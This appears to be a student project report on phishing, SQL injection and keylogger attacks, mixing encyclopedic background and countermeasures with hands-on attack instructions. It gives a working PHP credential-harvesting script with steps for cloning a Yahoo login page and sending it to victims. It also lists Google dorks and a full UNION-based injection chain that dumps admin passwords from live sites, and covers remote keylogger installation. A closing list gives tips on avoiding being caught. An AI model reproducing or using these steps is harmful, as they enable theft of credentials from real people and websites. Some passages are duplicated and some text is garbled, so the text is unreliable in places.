        An attacker can even use flaws in a trusted website's own scripts against the victim.
These types of attacks (known as cross-site scripting) are particularly problematic, because they
direct the user to sign in at their bank or service's own web page, where everything from the
web address to the security certificates appears correct. In reality, the link to the website is
crafted to carry out the attack, making it very difficult to spot without specialist knowledge. Just
such a flaw was used in 2006 against PayPal.




                                                25
         A Universal Man-in-the-middle (MITM) Phishing Kit, discovered in 2007, provides a
simple-to-use interface that allows a phisher to convincingly reproduce websites and capture
log-in details entered at the fake site.

         To avoid anti-phishing techniques that scan websites for phishing-related text,
phishers have begun to use Flash-based websites. These look much like the real website, but
hide the text in a multimedia object.

Link manipulation

        Most methods of phishing use some form of technical deception designed to make a link
in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization.
Misspelled URLs or the use of sub domains are common tricks used by phishers.

           In the following example URL, http://www.yourbank.example.com/, it appears as
though the URL will take you to the example section of the your bank website; actually this URL
points to the "your bank" (i.e. phishing) section of the example website. Another common trick
is to make the displayed text for a link (the text between the <A> tags) suggest a reliable
destination, when the link actually goes to the phishers' site. The following example link,
http://en.wikipedia.org/wiki/Deception, appears to take you to an article entitled "Genuine";
clicking on it will in fact take you to the article entitled "Deception". In the lower left hand
corner of most browsers you can preview and verify where the link is going to take you.

        An old method of spoofing used links containing the '@' symbol, originally intended as a
way to include a username and password (contrary to the standard).For example, the link
http://www.google.com@members.tripod.com/ might deceive a casual observer into believing
that it will open a page on www.google.com, whereas it actually directs the browser to a page
on members.tripod.com, using a username of www.google.com: the page opens normally,
regardless of the username supplied. Such URLs were disabled in Explorer, while Mozilla
Firebox and Opera present a warning message and give the option of continuing to the site or
canceling.

        A further problem with URLs has been found in the handling of internationalized domain
names (IDN) in web browsers that might allow visually identical web addresses to lead to
different, possibly malicious, websites. Despite the publicity surrounding the flaw, known as
IDN spoofing or homograph attack, phishers have taken advantage of a similar risk, using open
URL redirectors on the websites of trusted organizations to disguise malicious URLs with a
trusted domain. Even digital certificates do not solve this problem because it is quite possible
for a phisher to purchase a valid certificate and subsequently change content to spoof a
genuine website.




                                              26
Filter evasion

       Phishers have used images instead of text to make it harder for anti-phishing filters to
detect text commonly used in phishing e-mails.

Website forgery

       Once a victim visits the phishing website the deception is not over. Some phishing scams
use JavaScript commands in order to alter the address bar.This is done either by placing a
picture of a legitimate URL over the address bar, or by closing the original address bar and
opening a new one with the legitimate URL.

        An attacker can even use flaws in a trusted website's own scripts against the victim.
These types of attacks (known as cross-site scripting) are particularly problematic, because they
direct the user to sign in at their bank or service's own web page, where everything from the
web address to the security certificates appears correct. In reality, the link to the website is
crafted to carry out the attack, making it very difficult to spot without specialist knowledge. Just
such a flaw was used in 2006 against PayPal.

         A Universal Man-in-the-middle (MITM) Phishing Kit, discovered in 2007, provides a
simple-to-use interface that allows a phisher to convincingly reproduce websites and capture
log-in details entered at the fake site.

         To avoid anti-phishing techniques that scan websites for phishing-related text,
phishers have begun to use Flash-based websites. These look much like the real website, but
hide the text in a multimedia object.




                                                27
Performing a Phishing Attempt

Step1: Open any email server account web page like yahoomail.com and right click on the page
and then click on view source.

Step2:Press Ctrl+F and then find POST(please find the post related with login form).

Step3: Then Replace

Action=” HYPERLINK "https://login.yahoo.com/config/login"https://login.yahoo.com/config/login?”
With Action =”safin.php”
Here safin.php is php file which consist of a php script which help in posting the username and
password to the web server or on any free hosting site like eg:www.my3gb.com

Code containing in safin.php is shown below:
CODE:
<?php

header ('Location: http://www.yahoomail.com');

$posts     = '';
foreach($_POST as $k => $v){
  $posts .= '$_POST['.$k.'] = '.$v."\n";
}

$posts     .= "---------------------------------------------------\n";
$subject = $_SERVER['HTTP_HOST']."-".$_SEREVER['SERVER_NAME'];
$body      ='
'.$posts.'
';

@mail($emailto, $subject, $body, $from);
$handle = @fopen("cool.txt", "a+");
@fwrite($handle, $posts);
fclose($handle);
?>
Step 4: Then save the page as anyname.html

Step 5: Open safin.php script and at location add the URL at which to redirect the page.

Step 6: Then upload the page and safin.php script on a webserver. Here I am using HYPERLINK
"http://www.my3gb.com"www.my3gb.com.
Step 7:Then Transfer the links to the victims and if the victim will try to login from your page
the on your web server a auto cool.txt will be created in which you can see the password.

                                                28
 Counter Measures against Phishing
Everybody knows about phishing. Phishers impersonates a trusted web site, commonly a bank
or an online payment provider on order to extract confidential information from users. Not only
unsuspecting consumers are the victims of these scams,but in addition,the impersonated web
sites will be impacted by reduced consumer into their product as well as by financial losses due
to misuse of the collected information.

1.Consistent Branding.

For a consumer, the first and something only way to tell if a web site or an email is trustworthy
is the fact that either the URL or the layout “doesn’t look right”. In this context, it is important
to provide consistent visuals queues to end users to recognize communications from business.
In particular e- mail sent to customers should use the same ‘from’ domain name as you use at
your website. If you outsource mass mailing, insist that these emails will still use the familiar
‘From’ address. Consumer will otherwise not be able to distinguish between obvious fake and
real e-mail . Assits customers in securing their systems by not requiring the use of JavaScript
and Active-X .In Particular, design your website to be accessible by various browsers.

2. Monitors bounces to customer facing e-mail address.

In order to advertise their fake web sites, phishers typically use the same methods and address
lists used for spam. Many of the e-mail address on these list or expected to be invalid. If you
use consistent ‘From’ address the phishers will have to use this address to maximizes success.
This will result in some bounces being sent back to your own mail servers. Setting up a process
to screen these bounces for phishing e-mail will provide an early warning mechanism to alert
you of phishing scams.

3. Monitoring referrers to public web sites.

Phishers typically redirect the user to the authentic web site after the information has been
collected. This is done to hide the phishing site from the user and to improve its plausibility. The
web browser will send the URL of the phishing website as part of its Referrer header. Web
servers can be configured to log this data and most web servers already do so by default
monitoring this log for unusual referrer will again assist in finding phishing web sites.

4. Watermark web content.

Phishers attempt to emulate the look and feel of your websites as good as they can. Typically
the HTML code and images from your site are just copied As a result, the phishers will have to
visit the authentic site before setting up the fake site. Encoding the IP address and a time stamp
as part of your HTML code will likely allow you to figure out when the code was copied from


                                                 29
your site and who copied it. There are a numerous ways to accomplish this. Adding spaces
between HTML tags including extra GET Parameters, even water marking images. The most
appropriate method will depend on your web infrastructure.

5. Preposition counter measures

Once you find a site impersonating you there are a number of techniques you can use to limit
damage. Most web server will allow you to redirect users to special pages based on the
referrer field sent by the browser. As phishing victims are frequently directed back to your site
after they visited the fake site, you can use this technique to identify victims, or redirect them
to a warning page. If they are existing customers of your you may be able to identify them
based on prior cookies left behind by your site. These countermeasures typically need to be
prepared ahead of the phishing scam in order to evaluate the impact on website performance.
Once prepositioned, these redirects or specials logs can be enabled once a phishing site has
been identified.

6. Organizational and Administrative Countermeasures

The company website should include a link and contact information to report phishing or other
security issues. All phishing counter measures should be coordinated by a single individual.
Educating your customers about phishing and showcasing samples for them to learn how to
spot a phishing scam, will prevent them from becoming victims. If your web site allows access
to critical financial or personal information(e.g. Banks, Brokerages), you should consider the use
of strong authentication via hardware tokens.




                                                30
2. SQL Injection Attacks

An often used way to attack the security of an website is to input SQL statements in a web form
to get a badly designed website to dump the database content to the attacker - an SQL
injection. It's a code injection technique that exploits a security vulnerability in a websites
software. The vulnerability happens when user input is either incorrectly filtered for string
literal escape characters embedded in SQL statements or user input is not strongly typed and
unexpectedly executed. SQL commands are thus injected from the web form into the database
of an application (like queries) to change the database content or dump the database
information like credit card or passwords to the attacker. SQL injection is mostly known as an
attack vector for websites but can be used to attack any type of SQL database.

Using well designed query language interpreters can prevent SQL injections. In the wild, it has
been noted that applications experience, on average, 71 attempts an hour. When under direct
attack, some applications occasionally came under aggressive attacks and at their peak, were
attacked 800-1300 times per hour.

Forms of vulnerability

SQL Injection Attack (SQLIA) is considered one of the top 10 web application vulnerabilities of
2010 by the Open Web Application Security Project.[3] The attacking vector contains five main
sub-classes depending on the technical aspects of the attack's deployment:

       Classic SQLIA
       Inference SQL Injection
       Intracting with SQL Injection
       DBMS specific SQLIA
       Compounded SQLIA

Some security researchers propose that Classic SQLIA is outdated[4] though many web
applications are not hardened against them. Inference SQLIA is still a threat, because of its
dynamic and flexible deployment as an attacking scenario. The DBMS specific SQLIA should be
considered as supportive regardless of the utilization of Classic or Inference SQLIA.
Compounded SQLIA is a new term derived from research on SQL Injection Attacking Vector in
combination with other different web application attacks as:

       SQL Injection + Insufficient authentication
       SQL Injection + DDos attacks
       SQL Injection + DNS Hijacking
       SQL Injection + XSS




                                                31
32
Technical Implementations

Incorrectly filtered escape characters

This form of SQL injection occurs when user input is not filtered for escape characters and is
then passed into an SQL statement. This results in the potential manipulation of the statements
performed on the database by the end-user of the application.

The following line of code illustrates this vulnerability

statement = "SELECT * FROM users WHERE name = '" + userName + "';"

This SQL code is designed to pull up the records of the specified username from its table of
users. However, if the "userName" variable is crafted in a specific way by a malicious user, the
SQL statement may do more than the code author intended. For example, setting the
"userName" variable as

' or '1'='1

Or using comments to even block the rest of the query (there are three types of SQL
comments):[11]

' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '

renders one of the following SQL statements by the parent language:

SELECT * FROM users WHERE name = '' OR '1'='1';
SELECT * FROM users WHERE name = '' OR '1'='1' -- ';

If this code were to be used in an authentication procedure then this example could be used to
force the selection of a valid username because the evaluation of '1'='1' is always true.

The following value of "userName" in the statement below would cause the deletion of the
"users" table as well as the selection of all data from the "userinfo" table (in essence revealing
the information of every user), using an API that allows multiple statements:

a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't'

This input renders the final SQL statement as follows:

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM userinfo WHERE 't'
= 't';

                                                  33
While most SQL server implementations allow multiple statements to be executed with one call
in this way, some SQL APIs such as PHP's mysql_query(); function do not allow this for security
reasons. This prevents attackers from injecting entirely separate queries, but doesn't stop them
from modifying queries.



Incorrect type handling

This form of SQL injection occurs when a user supplied field is not strongly typed or is not
checked for type constraints. This could take place when a numeric field is to be used in a SQL
statement, but the programmer makes no checks to validate that the user supplied input is
numeric. For example:

statement := "SELECT * FROM userinfo WHERE id = " + a_variable + ";"

It is clear from this statement that the author intended a_variable to be a number correlating to
the "id" field. However, if it is in fact a string then the end-user may manipulate the statement
as they choose, thereby bypassing the need for escape characters. For example, setting
a_variable to

1;DROP TABLE users

will drop (delete) the "users" table from the database, since the SQL would be rendered as
follows:

SELECT * FROM userinfo WHERE id=1;DROP TABLE users;

Blind SQL injection

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the
results of the injection are not visible to the attacker. The page with the vulnerability may not
be one that displays data but will display differently depending on the results of a logical
statement injected into the legitimate SQL statement called for that page. This type of attack
can become time-intensive because a new statement must be crafted for each bit recovered.
There are several tools that can automate these attacks once the location of the vulnerability
and the target information has been established.




                                                34
Conditional responses

One type of blind SQL injection forces the database to evaluate a logical statement on an
ordinary application screen.

SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='1';

will result in a normal page while

SELECT booktitle FROM booklist WHERE bookId = 'OOk14cd' AND '1'='2';

will likely give a different result if the page is vulnerable to a SQL injection. An injection like this
may suggest to the attacker that a blind SQL injection is possible, leaving the attacker to devise
statements that evaluate to true or false depending on the contents of another column or table
outside of the SELECT statement's column list.

SELECT 1/0 FROM users WHERE username='ooo';



Mitigation



Parameterized statements
Main article: Prepared statement

With most development platforms, parameterized statements can be used that work with
parameters (sometimes called placeholders or bind variables) instead of embedding user input
in the statement. In many cases, the SQL statement is fixed, and each parameter is a scalar, not
a table. The user input is then assigned (bound) to a parameter.




Enforcement at the coding level

Using object-relational mapping libraries avoids the need to write SQL code. The ORM library in
effect will generate parameterized SQL statements from object-oriented code.




                                                   35
Escaping

A straightforward, though error-prone, way to prevent injections is to escape characters that
have a special meaning in SQL. The manual for an SQL DBMS explains which characters have a
special meaning, which allows creating a comprehensive blacklist of characters that need
translation. For instance, every occurrence of a single quote (') in a parameter must be replaced
by two single quotes ('') to form a valid SQL string literal. For example, in PHP it is usual to
escape parameters using the function mysql_real_escape_string(); before sending the SQL
query:


$query = sprintf("SELECT * FROM `Users` WHERE UserName='%s' AND Password='%s'",
          mysql_real_escape_string($Username),
          mysql_real_escape_string($Password));
mysql_query($query);



This function, i.e. mysql_real_escape_string(), calls MySQL's library function
mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r,
\, ', " and \x1a. This function must always (with few exceptions) be used to make data safe
before sending a query to MySQL.[14]
There are other functions for many database types in PHP such as pg_escape_string() for
PostgreSQL. There is, however, one function that works for escaping characters, and used
especially for injection in the databases that do not have escaping functions in PHP. This
function is: addslashes(string $str ). It returns a string with backslashes before characters that
need to be quoted in database queries etc. These characters are single quote ('), double quote
("), backslash (\) and NUL (the NULL byte).[15]
Routinely passing escaped strings to SQL is error prone because it is easy to forget to escape a
given string. Creating a transparent layer to secure the input can reduce this error-proneness, if
not entirely eliminate it.[16]




                                               36
Steps For SQL Injection Attacks

Step1: Find a Website vulnerable to SQL Injection

      Use Google dorks to find out the vulnerable sites, putting the following queries on
       Google search engine:

                 inurl:index.php?id=
                 inurl:trainers.php?id=
                 inurl:buy.php?category=
                 inurl:article.php?ID=

        Now you get a list displayed on the result page. Select one by one. Suppose we select the
first result. Click on it.

      Put ‘ (single quote) at the extreme end of the link displayed on the address bar and
       press ‘enter’.
      Now if a page opens up saying there is an SQL Error that means the website is 110%
       vulnerable to SQL Injection.

Step2: For Manually attacks there are certain steps to follow:

   1. We have to find sql vulnerable website,for that visit any website and find sql vulnerable
      link on the website contain .php?id= ,if we find the link we can say that this website
      contain sql vulnerability .



   2. Next step is to check whether the website is vulnerable to sql attack or not ,Put ‘ after
      the ?id=9′ ,if you get an error page or a blank page that means your site is vulnerable to
      attack.



   3. After that we have to find how many vulnerable column in the website,write order by
      1–,order by 2– to check vulnerable column till you cant get an error or blank page.



   4. After that find the vulnerable column in website. suppose in last step we find error in
      order by 7– that means no of column count is 6,so we write union all select 1,2,3,4,5,6–
      ,it will give the vulnerable column like 3 on the page,where we get the detail of
      database name,column name ,table ,name etc.


                                               37
   5. Next we have to find the table name ,write union all select 1,2,table_name,4,5,6 from
      information_schema.tables–



   6. We get the table name contain in the website ,suppose we find the admin table that
      means admin table contain all the login details,next step is to find column name .We
      write union all select 1,2,column_name,4,5,6 from information_schema.columns
      where table_name=’admin’–



   7. We get the column name also contain in the tables ,suppose user name and password
      are the table names ,next step is to find the detail of columns ,we write union all select
      1,2,group_concat(username,0x3a,password)4,5,6 from admin–



   8. Here it is we get the login detail on admin username and password.

Example :

www.site.com/index.php?id=10′        (error)

www.site.com/index.php?id=10 order by 1– to order by till error page

www.site.com/index.php?id=10 union all select 1,2,3,4,5,6,7–

www.site.com/index.php?id=10 union all select 1,2,table_name,4,5,6 from
information_schema.tables–

www.site.com/index.php?id=10 union all select 1,2,column_name,4,5,6 from
information_schema.columns where table_name=’admin’–

www.site.com/index.php?id=10 union all select
1,2,group_concat(username,0x3a,password),4,5,6 from admin–

you get the result of column

Step3: There is also another method to do SQL Injection Attack by using Havij tool in this tool
we have perform some simple steps.



                                               38
    1.   Copy the link of SQL vulnerable site in havij.
    2.   Analyze It
    3.   After Analyzing we get the database name.
    4.   There are certain option in the havij tool for editing the databases of the website.

Prevention from SQL Injection Attacks

Here some methods from prevention of SQL Injection Attacks In My SQL and php

Most new web developers have heard of SQL injection attacks, but not very many know that it
is fairly easy to prevent an attacker from gaining access to your data by filtering out the
vulnerabilities using MySQL extensions found in PHP

An SQL injection attack occurs when a hacker or cracker (a malicious hacker) attempts to dump
the data in a database table in a database-driven web site. In an unprotected and vulnerable
site, this is pretty easy to do.

In order for an HYPERLINK "http://www.topbits.com/sql-injection-attack-vulnerability.html" \t
"_blank" SQL injection attack to work, the site must use an unprotected SQL query that utilizes
data submitted by a user to lookup something in a database table. The data could be from a
search box, a login form or any type of query used to look up data using data input by user. It
also means that querystring data used to query a database can create vulnerabilities.

For example:

An very simple unprotected query might look like this:

SELECT * FROM items WHERE itemID = '$itemID'

Normally, you would expect a user to submit a username and password, which would be used
to query the database table to see if the username and password exists. But what if someone
used the following instead of a password?

‘ OR ’1′ = ’1

That would make the query used to look for the password look like this:

SELECT * FROM items WHERE itemID = '' OR '1' = '1'

This would always return a True response and could literally display the entire table as the
result for the query. This is a pretty scary thought if you are trying to keep your data secure.
The problem with SQL injection is that a hacker does not have to know anything about your
database or table structure.


                                                 39
What if an error or some other issue caused your table structure to be exposed? Hackers are
very good at forcing errors to occur that expose information that allows them to penetrate a
site deeper. What if the following was entered in the password field?

‘; drop table users;

There is a method for filtering the data that is used on the right side of the WHERE clause to
look up a row in a database. The trick is to escape any characters that may be in the user input
portion of the query that could lead to a successful attack.

Use the following function to add backslashes to suspect characters and filter any data that is
input by a user.

function cleanQuery($string)
{
  if(get_magic_quotes_gpc()) // prevents duplicate backslashes
  {
    $string = stripslashes($string);
  }
  if (phpversion() >= '4.3.0')
  {
    $string = mysql_real_escape_string($string);
  }
  else
  {
    $string = mysql_escape_string($string);
  }
  return $string;
}

// if you are using form data, use the function like this:
if (isset($_POST['itemID'])) $itemID = cleanQuery($_POST['itemID']);

// you can also filter the data as part of your query:
SELECT * FROM items WHERE itemID = '". cleanQuery($itemID)."' "

The first part looks to see if magic quotes is turned on. if so, it may have already added
backslash escapes though a POST or GET method used to pass the data. If backslashes were
added, they need to be removed prior to running it through the rest of the function.

The next part checks the PHP version. The built-in function that we want to use is called
HYPERLINK "http://www.php.net/mysql_real_escape_string" \t "_blank"
mysql_real_escape_string. This MySQL function only exists in PHP version 4.3.0 or newer. If you
are using an older version of PHP, another MySQL function is used called HYPERLINK
"http://www.php.net/mysql_escape_string" \t "_blank" mysql_escape_string.

mysql_escape_string is not as effective as the newer mysql_real_escape_string. The newer
version escapes the string according to the current character set. The character set is ignored

                                                        40
by mysql_escape_string, which can leave some vulnerabilities ope for sophisticated hackers. If
you find that you are using an older version of PHP and you are trying to protect sensitive data,
you really should upgrade to a current version of either PHP 4 or PHP 5.

So what does mysql_real_escape_string do?

This PHP library function prepends backslashes to the following characters: \n, \r, \, \x00, \x1a, ‘
and “. The important part is that the single and double quotes are escaped, because these are
the characters most likely to open up vulnerabilities.

For those who do not know what an escape is, it is a character that is pre-pended to another
character. When a character is escaped, it is ignored by the database. In other words, it makes
that character ineffective in a query. In the case of PHP, an escaped character is treated
differently by the PHP parser. The standard escape character used by PHP and MySQL is the
backslash.

In the case of the SQL query example used above, after running it through the routine, it now
looks like this, which breaks the query :

SELECT * FROM items WHERE itemID = '\' OR \'1\' = \'1'

This method should stop the bulk of the SQL injection attacks, but crackers and hackers are very
creative and are always finding new methods to break into systems. There are additional steps
that can be taken to filter out certain words, such as drop, grant, union, etc., but using this
method will strip these words from searches performed by you users. However, if you want to
add another level of security and do not have an issue with certain words being deleted from
queries, you can add the following just before if (phpversion() >= ’4.3.0′ ).

$badWords = array("/delete/i", "/update/i","/union/i","/insert/i","/drop/i","/http/i","/--/i");

$string = preg_replace($badWords, "", $string);

This additional step should prevent a malicious attacker from damaging a database if they
found a way to slip through. Just remember that is you take this additional step and you have a
site where someone might search for a “plumbing union” or a “drop cloth”, those queries
would not work as intended. If you are wondering what the trailing ‘i’ is following each word in
the array, it is required to make the preg_replace replacements case insensitive. This wasn’t
needed with eregi_replace, but that function has been HYPERLINK "http://www.tech-
evangelist.com/2009/11/11/php-deprecated-features/" deprecated in PHP 5.3. Another
important step that needs to be taken with any database is controlling user privileges. When
setting up a MySQL user, you should never assign any more privileges than they actually need
to accomplish the tasks that you allow on your site. Privaleges are easily assigned and managed
thought phpMyAdmin, which is found in the the control panel (cPanel, Plesk, etc.) for most
hosting companies.

                                                41
3. Key logger Attack

This is one of the oldest and simplest method of hacking a computer. A keylogger is a piece of
hardware or software that logs everything someone types. Key loggers are extremely easy to
make for windows using c++ and the”getasynckeystate” function and when combined with a
little con “you need this software to open file” you can generally get people to download the
software. Then , you program the software to email you after a week everything they typed and
delete itself. Phishing involves making a website that looks just like another website, but when
the user logs in, you steal their username/password. You could reconfigure a person’s network
settings so that a site like yahoo.com or gmail.com forwards to your version of gmail/ yahoo
instead. Then, when they try login, you steal their passwords, store them, and display
some”you need update” thing. Once they update it removes your phishing scam and the user
never even knows you stole their password. Any decent antivirus software will prevent this sort
of things by locking down your internet connection settings and tracking computer programs
for calls to “getAsyncKeyState” or other common keylogging function(at least, they “should”be
doing this).

Keystroke logging (often called keylogging) is the action of tracking (or logging) the keys struck
on a keyboard, typically in a covert manner so that the person using the keyboard is unaware
that their actions are being monitored. However most key logging programs prohibit
downloading from the affected victim due to encryption issues and wireless-to-computer
difficulties (unless directly on the victim's computer). There are numerous keylogging methods,
ranging from hardware and software-based approaches to electromagnetic and acoustic
analysis

Keyloggers are applications or devices that monitor the physical keystrokes of a computer user.
They then either aggregate the information locally for later retrieval or send it off to a spyware
server on the Internet. Some businesses use keyloggers, such as with the Spector Pro system, to
monitor employee activity, but the vast majority are applications installed without the user's
knowledge as part of a software download or system intrusion.

The true danger posed by keyloggers is their ability to bypass encryption controls and gather
sensitive data directly from the user. All the encryption in the world will not secure your data if
a hacker watches you type your encryption key. He can then simply use that plaintext key to
decrypt all of your "protected" communications from that point forward!




                                                42
Software-based keyloggers

These are software programs designed to work on the target computer’s operating system.
From a technical perspective there are five categories:

      Hypervisor-based: The keylogger can theoretically reside in a malware hypervisor
       running underneath the operating system, which remains untouched. It effectively
       becomes a virtual machine. Blue Pill is a conceptual example.
      Kernel-based: This method is difficult both to write and to combat. Such keyloggers
       reside at the kernel level and are thus difficult to detect, especially for user-mode
       applications. They are frequently implemented as rootkits that subvert the operating
       system kernel and gain unauthorized access to the hardware, making them very
       powerful. A keylogger using this method can act as a keyboard device driver for
       example, and thus gain access to any information typed on the keyboard as it goes to
       the operating system.
      API-based: These keyloggers hook keyboard APIs; the operating system then notifies the
       keylogger each time a key is pressed and the keylogger simply records it. Windows APIs
       on such as GetAsyncKeyState(), GetForegroundWindow(), etc. are used to poll the state
       of the keyboard or to subscribe to keyboard events.[1] These types of keyloggers are the
       easiest to write, but where constant polling of each key is required, they can cause a
       noticeable increase in CPU usage, and can also miss the occasional key. A more recent
       example simply polls the BIOS for pre-boot authentication PINs that have not been
       cleared from memory.[2]
      Form grabbing based: Form grabbing-based keyloggers log web form submissions by
       recording the web browsing onsubmit event functions. This records form data before it
       is passed over the Internet and bypasses HTTPS encryption.
      Packet analyzers: This involves capturing network traffic associated with HTTP POST
       events to retrieve unencrypted passwords.

Remote access software keyloggers

These are local software keyloggers with an added feature that allows access to the locally
recorded data from a remote location. Remote communication may be achieved using one of
these methods:

      Data is uploaded to a website, database or an FTP server.
      Data is periodically emailed to a pre-defined email address.
      Data is wirelessly transmitted by means of an attached hardware system.
      The software enables a remote login to the local machine from the Internet or the local
       network, for data logs stored on the target machine to be accessed.




                                              43
Related features

Software Keyloggers may be augmented with features that capture user information without
relying on keyboard key presses as the sole input. Some of these features include:

      Clipboard logging. Anything that has been copied to the clipboard can be captured by
       the program.



      Screen logging. Screenshots are taken in order to capture graphics-based information.
       Applications with screen logging abilities may take screenshots of the whole screen, just
       one application or even just around the mouse cursor. They may take these screenshots
       periodically or in response to user behaviours (for example, when a user has clicked the
       mouse). A practical application used by some keyloggers with this screen logging ability
       is to take small screenshots around where a mouse has just clicked; these defeat web-
       based keyboards (for example, the web-based screen keyboards that are often used by
       banks) and any web-based on-screen keyboard without screenshot protection.



      Programmatically capturing the text in a control. The Microsoft Windows API allows
       programs to request the text 'value' in some controls. This means that some passwords
       may be captured, even if they are hidden behind password masks (usually asterisks).



      The recording of every program/folder/window opened including a screenshot of each
       and every website visited, also including a screenshot of each.



      The recording of search engines queries, instant messenger conversations, FTP
       downloads and other Internet-based activities (including the bandwidth used).




                                              44
Hardware-based keyloggers

Hardware-based keyloggers do not depend upon any software being installed as they exist at a
hardware level in a computer system.

      Firmware-based: BIOS-level firmware that handles keyboard events can be modified to
       record these events as they are processed. Physical and/or root-level access is required
       to the machine, and the software loaded into the BIOS needs to be created for the
       specific hardware that it will be running on.[4]
      Keyboard hardware: Hardware keyloggers are used for keystroke logging by means of a
       hardware circuit that is attached somewhere in between the computer keyboard and
       the computer, typically inline with the keyboard's cable connector. More stealthy
       implementations can be installed or built into standard keyboards, so that no device is
       visible on the external cable. Both types log all keyboard activity to their internal
       memory, which can be subsequently accessed, for example, by typing in a secret key
       sequence.[5] A hardware keylogger has an advantage over a software solution: it is not
       dependent on being installed on the target computer's operating system and therefore
       will not interfere with any program running on the target machine or be detected by
       any software. However its physical presence may be detected if, for example, it is
       installed outside the case as an inline device between the computer and the keyboard.
       Some of these implementations have the ability to be controlled and monitored
       remotely by means of a wireless communication standard.[6]

Wireless keyboard sniffers

These passive sniffers collect packets of data being transferred from a wireless keyboard and its
receiver. As encryption may be used to secure the wireless communications between the two
devices, this may need to be cracked beforehand if the transmissions are to be read.



Keyboard overlays

Criminals have been known to use keyboard overlays on ATMs to capture people's PINs. Each
keypress is registered by the keyboard of the ATM as well as the criminal's keypad that is placed
over it. The device is designed to look like an integrated part of the machine so that bank
customers are unaware of its presence.




                                               45
Acoustic keyloggers

Acoustic cryptanalysis can be used to monitor the sound created by someone typing on a
computer. Each key on the keyboard makes a subtly different acoustic signature when stroked.
It is then possible to identify which keystroke signature relates to which keyboard character via
statistical methods such as frequency analysis. The repetition frequency of similar acoustic
keystroke signatures, the timings between different keyboard strokes and other context
information such as the probable language in which the user is writing are used in this analysis
to map sounds to letters.[8] A fairly long recording (1000 or more keystrokes) is required so that
a big enough sample is collected.[9]



Electromagnetic emissions

It is possible to capture the electromagnetic emissions of a wired keyboard from up to 20
metres (66 ft) away, without being physically wired to it.[10] In 2009, Swiss researches tested 11
different USB, PS/2 and laptop keyboards in a semi-anechoic chamber and found them all
vulnerable, primarily because of the prohibitive cost of adding shielding during manufacture.[11]
The researchers used a wide-band receiver to tune into the specific frequency of the emissions
radiated from the keyboards.




                                                46
Steps For Creating Keylogger In Ardamax Keylogger

Step1:There is remote installation has to be done in the key logger.

Step2:There is installation wizard for remote installation

Step3: we have to follow some steps for the installation.

Step4: In this is installation we have to set some settings.

Step5:After installation all keystroke is sent to you mail id.

Prevention From Key Logger Attacks

Here are five steps you can take to detect existing spyware and prevent future infections on
your network:



   1. Install spyware filters at the host level. There are plenty of spyware scanners available
      on the market. If you're looking for an inexpensive solution, you might consider
      Microsoft's beta tool, Windows Antispyware, Spybot or AdAware. Many commercial
      antivirus vendors, such as McAfee, also have spyware filters available that snap in to
      your enterprise antivirus solution.

   2. Install an application gateway with spyware content filtering. We're just starting to see
      the emergence of spyware appliance solutions that operate at the network level. One
      such system is the Blue Coat Spyware Interceptor. If your budget can bear it, you might
      consider this type of solution.

   3. Place egress filters on your network. It never hurts to have a good set of egress filters
      on your network. They might assist in blocking spyware attempting to "phone home."

   4. Monitor your intrusion-detection system (IDS) and keep the signatures current. If
      you're not able to block spyware from phoning home, you might at least be able to
      detect it with your IDS and use the reports to identify infected systems.

   5. Prevent users from installing downloaded software. Most spyware installations are the
      result of users installing unauthorized software downloaded from the Internet. If your
      organization's security policy permits, you should implement technical controls to
      prevent this type of activity.

Spyware, and the associated crime of identity theft, is one of the most important battles
currently facing information security professionals. It's time to ensure that your organization is
safe. Following these steps will help bring you closer to that goal.

                                                 47
                                      SCREEN SHOTS

1.Phishing

Steps

   1. Create an account on any free webhosting site.




                                            48
2. Registering




                 49
3. Create yahoo.com HTML Login Page.




                                       50
4. Upload PHP Script & other files.




                                      51
5. Log in website.




                     52
6. Login main page.




                      53
7. Click File manager.




                         54
8. Upload File list.




                       55
2. SQL Injection Attacks

Steps

1.Search SQL Injection vulnerable site on google.




                                               56
2. Put ‘ (single quote) at the extreme end of the link displayed on the address bar and press
‘enter’




3. Now if a page opens up saying there is an SQL Error, that means the website is 110%
vulnerable to SQL Injection




                                               57
4. After that we have to find how many vulnerable column in the website,write order by 1–
,order by 2– to check vulnerable column till you cant get an error or blank page.




5. After that find the vulnerable column in website. suppose in last step we find error in order
by 7– that means no of column count is 6,so we write union all select 1,2,3,4,5,6–,it will give
the vulnerable column like 3 on the page,where we get the detail of database name,column
name ,table ,name etc.




6. Next we have to find the table name ,write union all select 1,2,table_name,4,5,6 from
information_schema.tables–




                                               58
7. We get the table name contain in the website ,suppose we find the admin table that means
admin table contain all the login details,next step is to find column name .We write union all
select 1,2,column_name,4,5,6 from information_schema.columns where
table_name=’admin’–




8. We get the column name also contain in the tables ,suppose user name and password are the table
names ,next step is to find the detail of columns ,we write union all select
1,2,group_concat(username,0x3a,password)4,5,6 from admin–




                                                    59
9. Here it is we get the login detail on admin username and password.




                                             60
3.Key Logger Attacks



Steps

1.In this keylogger attack we use aradamax keylogger to create a keylogger in which we use
remote installation by a wizard in which particular setting is done.




                                              61
2.




3.




     62
4.




5.




     63
6.




7.




     64
8.




9.




     65
10.




11.




      66
12.




      67
Limitation of Project

In this project there might be some limitation due to some technical problem in the system all
the hacking attacks can work in under some condition

There are some condition in this hacking attacks can be perform are

1.In Phishing Attack there may be some chances of caught so you have use URL shorter before
sending phishing link to the victim.

2.If You are using free hosting site for phishing then the account can be closed so this case you
may need create another account on the hosting site.

3.Be careful before sending phishing link to the victim.

4.In SQL injection there may be some problem can occur during the searching of SQL vulnerable
website so in this case you can use SQL poison this tool helps you to searching website.

5.For SQL Injection attack you may need some patience during performing because it take so
much time .

6.For easiness you may use havij tool for finding the database of the website.

7.Be Careful during performing SQL Injection attack you might be caught.

8.In Keylogger Attack you may need the remote installation .

9.Before Remote installation you have to disable you antivirus and install to create a key logger.

10.Be Careful before installing key logger to the victim computer you might be caught.

11.These hacking attack can cause problem to your system.




                                                68
Future Scope

In this project our main motive provides information about the hacking attacks so you can
protect from these hacking attacks.

In future we have to provide some protection method from these hacking attacks.

In the field of information technology nothing is safe and secure our technology has some
loopholes or some limitation because of black hat hacker take benefit of this Insecurity.

So our main motive protects the information on the internet or in system.




Reference

            1.   Appin Technology Kit
